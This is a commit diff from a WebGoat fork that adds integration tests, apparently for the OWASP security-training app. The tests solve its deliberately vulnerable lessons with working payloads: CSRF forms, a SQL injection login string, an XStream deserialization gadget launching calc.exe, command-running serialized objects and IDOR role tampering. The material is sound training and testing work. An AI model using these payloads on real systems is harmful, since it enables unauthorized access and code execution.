dubey/WebGoat
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

feat: Introduce Playwright for UI testing

Browse Source 
Instead of using Robot Framework which does not run during a `mvn install`. Playwright seems to be the better approach. We can now write them as normal JUnit test and they are executed during a build.

Additionally this PR solves some interesting bugs found during writing Playwright tests:

- A reset of a lesson removes all assignments as a result another user wouldn't see any assignments
- If someone solves an assignment the assignment automatically got solved for a new user since the assignment included the `solved` flag which immediately got copied to new lesson progress.
- Introduction of assignment progress linking a assignment not directly to all users.
This commit is contained in:
Nanne Baars
2025-01-26 16:59:59 +01:00
committed by GitHub
parent 9d5ab5fb21
commit 8e45316638
47 changed files with 599 additions and 281 deletions
Download Patch File Download Diff File Expand all files Collapse all files

85
src/it/java/org/owasp/webgoat/integration/AccessControlIntegrationTest.java Normal file
View File

@ -0,0 +1,85 @@
package org.owasp.webgoat.integration;
import io.restassured.RestAssured;
import io.restassured.http.ContentType;
import java.util.Map;
import org.apache.http.HttpStatus;
import org.junit.jupiter.api.Test;
class AccessControlIntegrationTest extends IntegrationTest {
@Test
void testLesson() {
startLesson("MissingFunctionAC", true);
assignment1();
assignment2();
assignment3();
checkResults("MissingFunctionAC");
}
private void assignment3() {
// direct call should fail if user has not been created
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.contentType(ContentType.JSON)
.get(url("access-control/users-admin-fix"))
.then()
.statusCode(HttpStatus.SC_FORBIDDEN);
// create user
var userTemplate =
"""
{"username":"%s","password":"%s","admin": "true"}
""";
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.contentType(ContentType.JSON)
.body(String.format(userTemplate, this.getUser(), this.getUser()))
.post(url("access-control/users"))
.then()
.statusCode(HttpStatus.SC_OK);
// get the users
var userHash =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.contentType(ContentType.JSON)
.get(url("access-control/users-admin-fix"))
.then()
.statusCode(200)
.extract()
.jsonPath()
.get("find { it.username == \"Jerry\" }.userHash");
checkAssignment(url("access-control/user-hash-fix"), Map.of("userHash", userHash), true);
}
private void assignment2() {
var userHash =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.contentType(ContentType.JSON)
.get(url("access-control/users"))
.then()
.statusCode(200)
.extract()
.jsonPath()
.get("find { it.username == \"Jerry\" }.userHash");
checkAssignment(url("access-control/user-hash"), Map.of("userHash", userHash), true);
}
private void assignment1() {
var params = Map.of("hiddenMenu1", "Users", "hiddenMenu2", "Config");
checkAssignment(url("access-control/hidden-menu"), params, true);
}
}

286
src/it/java/org/owasp/webgoat/integration/CSRFIntegrationTest.java Normal file
View File

@ -0,0 +1,286 @@
package org.owasp.webgoat.integration;
import static org.assertj.core.api.Assertions.assertThat;
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.DynamicTest.dynamicTest;
import io.restassured.RestAssured;
import io.restassured.http.ContentType;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Arrays;
import java.util.HashMap;
import java.util.Map;
import lombok.Data;
import lombok.SneakyThrows;
import org.junit.jupiter.api.AfterEach;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.DynamicTest;
import org.junit.jupiter.api.TestFactory;
import org.owasp.webgoat.container.lessons.Assignment;
public class CSRFIntegrationTest extends IntegrationTest {
private static final String trickHTML3 =
"<!DOCTYPE html><html><body><form action=\"WEBGOATURL\" method=\"POST\">\n"
+ "<input type=\"hidden\" name=\"csrf\" value=\"thisisnotchecked\"/>\n"
+ "<input type=\"submit\" name=\"submit\" value=\"assignment 3\"/>\n"
+ "</form></body></html>";
private static final String trickHTML4 =
"<!DOCTYPE html><html><body><form action=\"WEBGOATURL\" method=\"POST\">\n"
+ "<input type=\"hidden\" name=\"reviewText\" value=\"hoi\"/>\n"
+ "<input type=\"hidden\" name=\"starts\" value=\"3\"/>\n"
+ "<input type=\"hidden\" name=\"validateReq\""
+ " value=\"2aa14227b9a13d0bede0388a7fba9aa9\"/>\n"
+ "<input type=\"submit\" name=\"submit\" value=\"assignment 4\"/>\n"
+ "</form>\n"
+ "</body></html>";
private static final String trickHTML7 =
"<!DOCTYPE html><html><body><form action=\"WEBGOATURL\" enctype='text/plain'"
+ " method=\"POST\">\n"
+ "<input type=\"hidden\""
+ " name='{\"name\":\"WebGoat\",\"email\":\"webgoat@webgoat.org\",\"content\":\"WebGoat"
+ " is the best!!' value='\"}' />\n"
+ "<input type=\"submit\" value=\"assignment 7\"/>\n"
+ "</form></body></html>";
private static final String trickHTML8 =
"<!DOCTYPE html><html><body><form action=\"WEBGOATURL\" method=\"POST\">\n"
+ "<input type=\"hidden\" name=\"username\" value=\"csrf-USERNAME\"/>\n"
+ "<input type=\"hidden\" name=\"password\" value=\"password\"/>\n"
+ "<input type=\"hidden\" name=\"matchingPassword\" value=\"password\"/>\n"
+ "<input type=\"hidden\" name=\"agree\" value=\"agree\"/>\n"
+ "<input type=\"submit\" value=\"assignment 8\"/>\n"
+ "</form></body></html>";
private String webwolfFileDir;
@BeforeEach
@SneakyThrows
public void init() {
startLesson("CSRF");
webwolfFileDir = getWebWolfFileServerLocation();
uploadTrickHtml("csrf3.html", trickHTML3.replace("WEBGOATURL", url("csrf/basic-get-flag")));
uploadTrickHtml("csrf4.html", trickHTML4.replace("WEBGOATURL", url("csrf/review")));
uploadTrickHtml("csrf7.html", trickHTML7.replace("WEBGOATURL", url("csrf/feedback/message")));
uploadTrickHtml(
"csrf8.html",
trickHTML8.replace("WEBGOATURL", url("login")).replace("USERNAME", this.getUser()));
}
@TestFactory
Iterable<DynamicTest> testCSRFLesson() {
return Arrays.asList(
dynamicTest("assignment 3", () -> checkAssignment3(callTrickHtml("csrf3.html"))),
dynamicTest("assignment 4", () -> checkAssignment4(callTrickHtml("csrf4.html"))),
dynamicTest("assignment 7", () -> checkAssignment7(callTrickHtml("csrf7.html"))),
dynamicTest("assignment 8", () -> checkAssignment8(callTrickHtml("csrf8.html"))));
}
@AfterEach
public void shutdown() throws IOException {
// logout();
login(); // because old cookie got replaced and invalidated
startLesson("CSRF", false);
checkResults("CSRF");
}
private void uploadTrickHtml(String htmlName, String htmlContent) throws IOException {
// remove any left over html
Path webWolfFilePath = Paths.get(webwolfFileDir);
if (webWolfFilePath.resolve(Paths.get(this.getUser(), htmlName)).toFile().exists()) {
Files.delete(webWolfFilePath.resolve(Paths.get(this.getUser(), htmlName)));
}
// upload trick html
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("WEBWOLFSESSION", getWebWolfCookie())
.multiPart("file", htmlName, htmlContent.getBytes())
.post(new WebWolfUrlBuilder().path("fileupload").build())
.then()
.extract()
.response()
.getBody()
.asString();
}
private String callTrickHtml(String htmlName) {
String result =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.cookie("WEBWOLFSESSION", getWebWolfCookie())
.get(new WebWolfUrlBuilder().path("files/%s/%s", this.getUser(), htmlName).build())
.then()
.extract()
.response()
.getBody()
.asString();
result = result.substring(8 + result.indexOf("action=\""));
result = result.substring(0, result.indexOf("\""));
return result;
}
private void checkAssignment3(String goatURL) {
String flag =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.header("Referer", new WebWolfUrlBuilder().path("files/fake.html").build())
.post(goatURL)
.then()
.extract()
.path("flag")
.toString();
Map<String, Object> params = new HashMap<>();
params.clear();
params.put("confirmFlagVal", flag);
checkAssignment(url("csrf/confirm-flag-1"), params, true);
}
private void checkAssignment4(String goatURL) {
Map<String, Object> params = new HashMap<>();
params.clear();
params.put("reviewText", "test review");
params.put("stars", "5");
params.put(
"validateReq", "2aa14227b9a13d0bede0388a7fba9aa9"); // always the same token is the weakness
boolean result =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.header("Referer", new WebWolfUrlBuilder().path("files/fake.html").build())
.formParams(params)
.post(goatURL)
.then()
.extract()
.path("lessonCompleted");
assertEquals(true, result);
}
private void checkAssignment7(String goatURL) {
Map<String, Object> params = new HashMap<>();
params.put(
"{\"name\":\"WebGoat\",\"email\":\"webgoat@webgoat.org\",\"content\":\"WebGoat is the"
+ " best!!",
"\"}");
String flag =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.header("Referer", new WebWolfUrlBuilder().path("files/fake.html").build())
.contentType(ContentType.TEXT)
.body(
"{\"name\":\"WebGoat\",\"email\":\"webgoat@webgoat.org\",\"content\":\"WebGoat is"
+ " the best!!=\"}")
.post(goatURL)
.then()
.extract()
.asString();
flag = flag.substring(9 + flag.indexOf("flag is:"));
flag = flag.substring(0, flag.indexOf("\""));
params.clear();
params.put("confirmFlagVal", flag);
checkAssignment(url("csrf/feedback"), params, true);
}
private void checkAssignment8(String goatURL) {
// first make sure there is an attack csrf- user
registerCSRFUser();
Map<String, Object> params = new HashMap<>();
params.clear();
params.put("username", "csrf-" + this.getUser());
params.put("password", "password");
// login and get the new cookie
String newCookie =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.header("Referer", new WebWolfUrlBuilder().path("files/fake.html").build())
.params(params)
.post(goatURL)
.then()
.extract()
.cookie("JSESSIONID");
// select the lesson
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", newCookie)
.get(url("CSRF.lesson.lesson"))
.then()
.statusCode(200);
// click on the assignment
boolean result =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", newCookie)
.post(url("csrf/login"))
.then()
.statusCode(200)
.extract()
.path("lessonCompleted");
assertThat(result).isTrue();
login();
startLesson("CSRF", false);
Overview[] assignments =
RestAssured.given()
.cookie("JSESSIONID", getWebGoatCookie())
.relaxedHTTPSValidation()
.get(url("service/lessonoverview.mvc/CSRF"))
.then()
.extract()
.jsonPath()
.getObject("$", Overview[].class);
assertThat(assignments)
.filteredOn(a -> a.getAssignment().getName().equals("CSRFLogin"))
.extracting(o -> o.solved)
.containsExactly(true);
}
@Data
private static class Overview {
Assignment assignment;
boolean solved;
}
/** Try to register the new user. Ignore the result. */
private void registerCSRFUser() {
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.formParam("username", "csrf-" + this.getUser())
.formParam("password", "password")
.formParam("matchingPassword", "password")
.formParam("agree", "agree")
.post(url("register.mvc"));
}
}

170
src/it/java/org/owasp/webgoat/integration/ChallengeIntegrationTest.java Normal file
View File

@ -0,0 +1,170 @@
package org.owasp.webgoat.integration;
import static org.junit.jupiter.api.Assertions.assertTrue;
import io.restassured.RestAssured;
import java.util.Arrays;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import org.assertj.core.api.Assertions;
import org.junit.jupiter.api.Test;
import org.springframework.http.HttpStatus;
public class ChallengeIntegrationTest extends IntegrationTest {
@Test
void testChallenge1() {
startLesson("Challenge1");
byte[] resultBytes =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("challenge/logo"))
.then()
.statusCode(200)
.extract()
.asByteArray();
String pincode = new String(Arrays.copyOfRange(resultBytes, 81216, 81220));
Map<String, Object> params = new HashMap<>();
params.clear();
params.put("username", "admin");
params.put("password", "!!webgoat_admin_1234!!".replace("1234", pincode));
checkAssignment(url("challenge/1"), params, true);
String result =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.formParams(params)
.post(url("challenge/1"))
.then()
.statusCode(200)
.extract()
.asString();
String flag = result.substring(result.indexOf("flag") + 6, result.indexOf("flag") + 42);
params.clear();
params.put("flag", flag);
checkAssignment(url("challenge/flag/1"), params, true);
checkResults("Challenge1");
List<String> capturefFlags =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("scoreboard-data"))
.then()
.statusCode(200)
.extract()
.jsonPath()
.get("find { it.username == \"" + this.getUser() + "\" }.flagsCaptured");
assertTrue(capturefFlags.contains("Admin lost password"));
}
@Test
void testChallenge5() {
startLesson("Challenge5");
Map<String, Object> params = new HashMap<>();
params.clear();
params.put("username_login", "Larry");
params.put("password_login", "1' or '1'='1");
String result =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.formParams(params)
.post(url("challenge/5"))
.then()
.statusCode(200)
.extract()
.asString();
String flag = result.substring(result.indexOf("flag") + 6, result.indexOf("flag") + 42);
params.clear();
params.put("flag", flag);
checkAssignment(url("challenge/flag/5"), params, true);
checkResults("Challenge5");
List<String> capturefFlags =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("scoreboard-data"))
.then()
.statusCode(200)
.extract()
.jsonPath()
.get("find { it.username == \"" + this.getUser() + "\" }.flagsCaptured");
assertTrue(capturefFlags.contains("Without password"));
}
@Test
void testChallenge7() {
startLesson("Challenge7");
cleanMailbox();
// One should first be able to download git.zip from WebGoat
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("challenge/7/.git"))
.then()
.statusCode(200)
.extract()
.asString();
// Should email WebWolf inbox this should give a hint to the link being static
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.formParams("email", getUser() + "@webgoat.org")
.post(url("challenge/7"))
.then()
.statusCode(200)
.extract()
.asString();
// Check whether email has been received
var responseBody =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("WEBWOLFSESSION", getWebWolfCookie())
.get(new WebWolfUrlBuilder().path("mail").build())
.then()
.extract()
.response()
.getBody()
.asString();
Assertions.assertThat(responseBody).contains("Hi, you requested a password reset link");
// Call reset link with admin link
String result =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("challenge/7/reset-password/{link}"), "375afe1104f4a487a73823c50a9292a2")
.then()
.statusCode(HttpStatus.ACCEPTED.value())
.extract()
.asString();
String flag = result.substring(result.indexOf("flag") + 6, result.indexOf("flag") + 42);
checkAssignment(url("challenge/flag/7"), Map.of("flag", flag), true);
}
}

156
src/it/java/org/owasp/webgoat/integration/CryptoIntegrationTest.java Normal file
View File

@ -0,0 +1,156 @@
package org.owasp.webgoat.integration;
import static org.junit.jupiter.api.Assertions.fail;
import io.restassured.RestAssured;
import java.nio.charset.Charset;
import java.security.NoSuchAlgorithmException;
import java.security.PrivateKey;
import java.security.interfaces.RSAPrivateKey;
import java.security.spec.InvalidKeySpecException;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;
import javax.xml.bind.DatatypeConverter;
import org.junit.jupiter.api.Test;
import org.owasp.webgoat.lessons.cryptography.CryptoUtil;
import org.owasp.webgoat.lessons.cryptography.HashingAssignment;
public class CryptoIntegrationTest extends IntegrationTest {
@Test
public void runTests() {
startLesson("Cryptography");
checkAssignment2();
checkAssignment3();
// Assignment 4
try {
checkAssignment4();
} catch (NoSuchAlgorithmException e) {
e.printStackTrace();
fail();
}
try {
checkAssignmentSigning();
} catch (Exception e) {
e.printStackTrace();
fail();
}
checkAssignmentDefaults();
checkResults("Cryptography");
}
private void checkAssignment2() {
String basicEncoding =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("crypto/encoding/basic"))
.then()
.extract()
.asString();
basicEncoding = basicEncoding.substring("Authorization: Basic ".length());
String decodedString = new String(Base64.getDecoder().decode(basicEncoding.getBytes()));
String answer_user = decodedString.split(":")[0];
String answer_pwd = decodedString.split(":")[1];
Map<String, Object> params = new HashMap<>();
params.clear();
params.put("answer_user", answer_user);
params.put("answer_pwd", answer_pwd);
checkAssignment(url("crypto/encoding/basic-auth"), params, true);
}
private void checkAssignment3() {
String answer_1 = "databasepassword";
Map<String, Object> params = new HashMap<>();
params.clear();
params.put("answer_pwd1", answer_1);
checkAssignment(url("crypto/encoding/xor"), params, true);
}
private void checkAssignment4() throws NoSuchAlgorithmException {
String md5Hash =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("crypto/hashing/md5"))
.then()
.extract()
.asString();
String sha256Hash =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("crypto/hashing/sha256"))
.then()
.extract()
.asString();
String answer_1 = "unknown";
String answer_2 = "unknown";
for (String secret : HashingAssignment.SECRETS) {
if (md5Hash.equals(HashingAssignment.getHash(secret, "MD5"))) {
answer_1 = secret;
}
if (sha256Hash.equals(HashingAssignment.getHash(secret, "SHA-256"))) {
answer_2 = secret;
}
}
Map<String, Object> params = new HashMap<>();
params.clear();
params.put("answer_pwd1", answer_1);
params.put("answer_pwd2", answer_2);
checkAssignment(url("crypto/hashing"), params, true);
}
private void checkAssignmentSigning() throws NoSuchAlgorithmException, InvalidKeySpecException {
String privatePEM =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("crypto/signing/getprivate"))
.then()
.extract()
.asString();
PrivateKey privateKey = CryptoUtil.getPrivateKeyFromPEM(privatePEM);
RSAPrivateKey privk = (RSAPrivateKey) privateKey;
String modulus = DatatypeConverter.printHexBinary(privk.getModulus().toByteArray());
String signature = CryptoUtil.signMessage(modulus, privateKey);
Map<String, Object> params = new HashMap<>();
params.clear();
params.put("modulus", modulus);
params.put("signature", signature);
checkAssignment(url("crypto/signing/verify"), params, true);
}
private void checkAssignmentDefaults() {
String text =
new String(
Base64.getDecoder()
.decode(
"TGVhdmluZyBwYXNzd29yZHMgaW4gZG9ja2VyIGltYWdlcyBpcyBub3Qgc28gc2VjdXJl"
.getBytes(Charset.forName("UTF-8"))));
Map<String, Object> params = new HashMap<>();
params.clear();
params.put("secretText", text);
params.put("secretFileName", "default_secret");
checkAssignment(url("crypto/secure/defaults"), params, true);
}
}

33
src/it/java/org/owasp/webgoat/integration/DeserializationIntegrationTest.java Normal file
View File

@ -0,0 +1,33 @@
package org.owasp.webgoat.integration;
import java.io.IOException;
import java.util.HashMap;
import java.util.Map;
import org.dummy.insecure.framework.VulnerableTaskHolder;
import org.junit.jupiter.api.Test;
import org.owasp.webgoat.lessons.deserialization.SerializationHelper;
public class DeserializationIntegrationTest extends IntegrationTest {
private static String OS = System.getProperty("os.name").toLowerCase();
@Test
public void runTests() throws IOException {
startLesson("InsecureDeserialization");
Map<String, Object> params = new HashMap<>();
params.clear();
if (OS.indexOf("win") > -1) {
params.put(
"token",
SerializationHelper.toString(new VulnerableTaskHolder("wait", "ping localhost -n 5")));
} else {
params.put(
"token", SerializationHelper.toString(new VulnerableTaskHolder("wait", "sleep 5")));
}
checkAssignment(url("InsecureDeserialization/task"), params, true);
checkResults("InsecureDeserialization");
}
}

220
src/it/java/org/owasp/webgoat/integration/GeneralLessonIntegrationTest.java Normal file
View File

@ -0,0 +1,220 @@
package org.owasp.webgoat.integration;
import io.restassured.RestAssured;
import io.restassured.http.ContentType;
import java.util.HashMap;
import java.util.Map;
import org.hamcrest.CoreMatchers;
import org.hamcrest.MatcherAssert;
import org.junit.jupiter.api.Test;
import org.springframework.util.StringUtils;
public class GeneralLessonIntegrationTest extends IntegrationTest {
@Test
public void httpBasics() {
startLesson("HttpBasics");
Map<String, Object> params = new HashMap<>();
params.clear();
params.put("person", "goatuser");
checkAssignment(url("HttpBasics/attack1"), params, true);
params.clear();
params.put("answer", "POST");
params.put("magic_answer", "33");
params.put("magic_num", "4");
checkAssignment(url("HttpBasics/attack2"), params, false);
params.clear();
params.put("answer", "POST");
params.put("magic_answer", "33");
params.put("magic_num", "33");
checkAssignment(url("HttpBasics/attack2"), params, true);
checkResults("HttpBasics");
}
@Test
public void solveAsOtherUserHttpBasics() {
login("steven");
startLesson("HttpBasics");
Map<String, Object> params = new HashMap<>();
params.clear();
params.put("person", "goatuser");
checkAssignment(url("HttpBasics/attack1"), params, true);
}
@Test
public void httpProxies() {
startLesson("HttpProxies");
MatcherAssert.assertThat(
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.header("x-request-intercepted", "true")
.contentType(ContentType.JSON)
.get(url("HttpProxies/intercept-request?changeMe=Requests are tampered easily"))
.then()
.statusCode(200)
.extract()
.path("lessonCompleted"),
CoreMatchers.is(true));
checkResults("HttpProxies");
}
@Test
public void cia() {
startLesson("CIA");
Map<String, Object> params = new HashMap<>();
params.clear();
params.put(
"question_0_solution",
"Solution 3: By stealing a database where names and emails are stored and uploading it to a"
+ " website.");
params.put(
"question_1_solution",
"Solution 1: By changing the names and emails of one or more users stored in a database.");
params.put(
"question_2_solution",
"Solution 4: By launching a denial of service attack on the servers.");
params.put(
"question_3_solution",
"Solution 2: The systems security is compromised even if only one goal is harmed.");
checkAssignment(url("cia/quiz"), params, true);
checkResults("CIA");
}
@Test
public void vulnerableComponents() {
if (StringUtils.hasText(System.getProperty("running.in.docker"))) {
String solution =
"<contact class='dynamic-proxy'>\n"
+ "<interface>org.owasp.webgoat.lessons.vulnerablecomponents.Contact</interface>\n"
+ " <handler class='java.beans.EventHandler'>\n"
+ " <target class='java.lang.ProcessBuilder'>\n"
+ " <command>\n"
+ " <string>calc.exe</string>\n"
+ " </command>\n"
+ " </target>\n"
+ " <action>start</action>\n"
+ " </handler>\n"
+ "</contact>";
startLesson("VulnerableComponents");
Map<String, Object> params = new HashMap<>();
params.clear();
params.put("payload", solution);
checkAssignment(url("VulnerableComponents/attack1"), params, true);
checkResults("VulnerableComponents");
}
}
@Test
public void insecureLogin() {
startLesson("InsecureLogin");
Map<String, Object> params = new HashMap<>();
params.clear();
params.put("username", "CaptainJack");
params.put("password", "BlackPearl");
checkAssignment(url("InsecureLogin/task"), params, true);
checkResults("InsecureLogin");
}
@Test
public void securePasswords() {
startLesson("SecurePasswords");
Map<String, Object> params = new HashMap<>();
params.clear();
params.put("password", "ajnaeliclm^&&@kjn.");
checkAssignment(url("SecurePasswords/assignment"), params, true);
checkResults("SecurePasswords");
startLesson("AuthBypass");
params.clear();
params.put("secQuestion2", "John");
params.put("secQuestion3", "Main");
params.put("jsEnabled", "1");
params.put("verifyMethod", "SEC_QUESTIONS");
params.put("userId", "12309746");
checkAssignment(url("auth-bypass/verify-account"), params, true);
checkResults("AuthBypass");
startLesson("HttpProxies");
MatcherAssert.assertThat(
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.header("x-request-intercepted", "true")
.contentType(ContentType.JSON)
.get(url("HttpProxies/intercept-request?changeMe=Requests are tampered easily"))
.then()
.statusCode(200)
.extract()
.path("lessonCompleted"),
CoreMatchers.is(true));
checkResults("HttpProxies");
}
@Test
public void chrome() {
startLesson("ChromeDevTools");
Map<String, Object> params = new HashMap<>();
params.clear();
params.put("param1", "42");
params.put("param2", "24");
String result =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.header("webgoat-requested-by", "dom-xss-vuln")
.header("X-Requested-With", "XMLHttpRequest")
.formParams(params)
.post(url("CrossSiteScripting/phone-home-xss"))
.then()
.statusCode(200)
.extract()
.path("output");
String secretNumber = result.substring("phoneHome Response is ".length());
params.clear();
params.put("successMessage", secretNumber);
checkAssignment(url("ChromeDevTools/dummy"), params, true);
params.clear();
params.put("number", "24");
params.put("network_num", "24");
checkAssignment(url("ChromeDevTools/network"), params, true);
checkResults("ChromeDevTools");
}
@Test
public void authByPass() {
startLesson("AuthBypass");
Map<String, Object> params = new HashMap<>();
params.clear();
params.put("secQuestion2", "John");
params.put("secQuestion3", "Main");
params.put("jsEnabled", "1");
params.put("verifyMethod", "SEC_QUESTIONS");
params.put("userId", "12309746");
checkAssignment(url("auth-bypass/verify-account"), params, true);
checkResults("AuthBypass");
}
@Test
public void lessonTemplate() {
startLesson("LessonTemplate");
Map<String, Object> params = new HashMap<>();
params.clear();
params.put("param1", "secr37Value");
params.put("param2", "Main");
checkAssignment(url("lesson-template/sample-attack"), params, true);
checkResults("LessonTemplate");
}
}

100
src/it/java/org/owasp/webgoat/integration/IDORIntegrationTest.java Normal file
View File

@ -0,0 +1,100 @@
package org.owasp.webgoat.integration;
import static org.junit.jupiter.api.DynamicTest.dynamicTest;
import io.restassured.RestAssured;
import io.restassured.http.ContentType;
import java.util.Arrays;
import java.util.HashMap;
import java.util.Map;
import org.hamcrest.CoreMatchers;
import org.hamcrest.MatcherAssert;
import org.junit.jupiter.api.AfterEach;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.DynamicTest;
import org.junit.jupiter.api.TestFactory;
public class IDORIntegrationTest extends IntegrationTest {
@BeforeEach
public void init() {
startLesson("IDOR");
}
@TestFactory
Iterable<DynamicTest> testIDORLesson() {
return Arrays.asList(
dynamicTest("assignment 2 - login", this::loginIDOR),
dynamicTest("profile", this::profile));
}
@AfterEach
public void shutdown() {
checkResults("IDOR");
}
private void loginIDOR() {
Map<String, Object> params = new HashMap<>();
params.put("username", "tom");
params.put("password", "cat");
checkAssignment(url("IDOR/login"), params, true);
}
private void profile() {
// View profile - assignment 3a
MatcherAssert.assertThat(
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("IDOR/profile"))
.then()
.statusCode(200)
.extract()
.path("userId"),
CoreMatchers.is("2342384"));
// Show difference - assignment 3b
Map<String, Object> params = new HashMap<>();
params.put("attributes", "userId,role");
checkAssignment(url("IDOR/diff-attributes"), params, true);
// View profile another way - assignment 4
params.clear();
params.put("url", "WebGoat/IDOR/profile/2342384");
checkAssignment(url("IDOR/profile/alt-path"), params, true);
// assignment 5a
MatcherAssert.assertThat(
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("IDOR/profile/2342388"))
.then()
.statusCode(200)
.extract()
.path("lessonCompleted"),
CoreMatchers.is(true));
// assignment 5b
MatcherAssert.assertThat(
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.cookie("JSESSIONID", getWebGoatCookie())
.contentType(ContentType.JSON) // part of the lesson
.body(
"{\"role\":\"1\", \"color\":\"red\", \"size\":\"large\", \"name\":\"Buffalo Bill\","
+ " \"userId\":\"2342388\"}")
.put(url("IDOR/profile/2342388"))
.then()
.statusCode(200)
.extract()
.path("lessonCompleted"),
CoreMatchers.is(true));
}
}

300
src/it/java/org/owasp/webgoat/integration/IntegrationTest.java Normal file
View File

@ -0,0 +1,300 @@
package org.owasp.webgoat.integration;
import static io.restassured.RestAssured.given;
import io.restassured.RestAssured;
import io.restassured.filter.log.LogDetail;
import io.restassured.http.ContentType;
import java.util.Map;
import lombok.Getter;
import org.hamcrest.CoreMatchers;
import org.hamcrest.MatcherAssert;
import org.junit.jupiter.api.AfterEach;
import org.junit.jupiter.api.BeforeEach;
import org.owasp.webgoat.ServerUrlConfig;
import org.springframework.http.HttpStatus;
public abstract class IntegrationTest {
private final ServerUrlConfig webGoatUrlConfig = ServerUrlConfig.webGoat();
@Getter private final ServerUrlConfig webWolfUrlConfig = ServerUrlConfig.webWolf();
@Getter private String webGoatCookie;
@Getter private String webWolfCookie;
@Getter private final String user = "webgoat";
protected String url(String url) {
return webGoatUrlConfig.url(url);
}
protected class WebWolfUrlBuilder {
private boolean attackMode = false;
private String path = null;
protected String build() {
return webWolfUrlConfig.url(path != null ? path : "");
}
/**
* In attack mode it means WebGoat calls WebWolf to perform an attack. In this case we need to
* use port 9090 in a Docker environment.
*/
protected WebWolfUrlBuilder attackMode() {
attackMode = true;
return this;
}
protected WebWolfUrlBuilder path(String path) {
this.path = path;
return this;
}
protected WebWolfUrlBuilder path(String path, String... uriVariables) {
this.path = path.formatted(uriVariables);
return this;
}
}
/**
* Debugging options: install TestContainers Desktop and map port 5005 to the host machine with
* https://newsletter.testcontainers.com/announcements/set-fixed-ports-to-easily-debug-development-services
*
* <p>Start the test and connect a remote debugger in IntelliJ to localhost:5005 and attach it.
*/
// private static GenericContainer<?> webGoatContainer =
// new GenericContainer(new ImageFromDockerfile("webgoat").withFileFromPath("/",
// Paths.get(".")))
// .withLogConsumer(new Slf4jLogConsumer(LoggerFactory.getLogger("webgoat")))
// .withExposedPorts(8080, 9090, 5005)
// .withEnv(
// "_JAVA_OPTIONS",
// "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=0.0.0.0:5005")
// .waitingFor(Wait.forHealthcheck());
//
// static {
// webGoatContainer.start();
// }
@BeforeEach
public void login() {
login("webgoat");
}
protected void login(String user) {
String location =
given()
.when()
.relaxedHTTPSValidation()
.formParam("username", user)
.formParam("password", "password")
.post(url("login"))
.then()
.log()
.ifValidationFails(LogDetail.ALL) // Log the response details if validation fails
.cookie("JSESSIONID")
.statusCode(302)
.extract()
.header("Location");
if (location.endsWith("?error")) {
webGoatCookie =
RestAssured.given()
.when()
.relaxedHTTPSValidation()
.formParam("username", user)
.formParam("password", "password")
.formParam("matchingPassword", "password")
.formParam("agree", "agree")
.post(url("register.mvc"))
.then()
.cookie("JSESSIONID")
.statusCode(302)
.extract()
.cookie("JSESSIONID");
} else {
webGoatCookie =
given()
.when()
.relaxedHTTPSValidation()
.formParam("username", user)
.formParam("password", "password")
.post(url("login"))
.then()
.cookie("JSESSIONID")
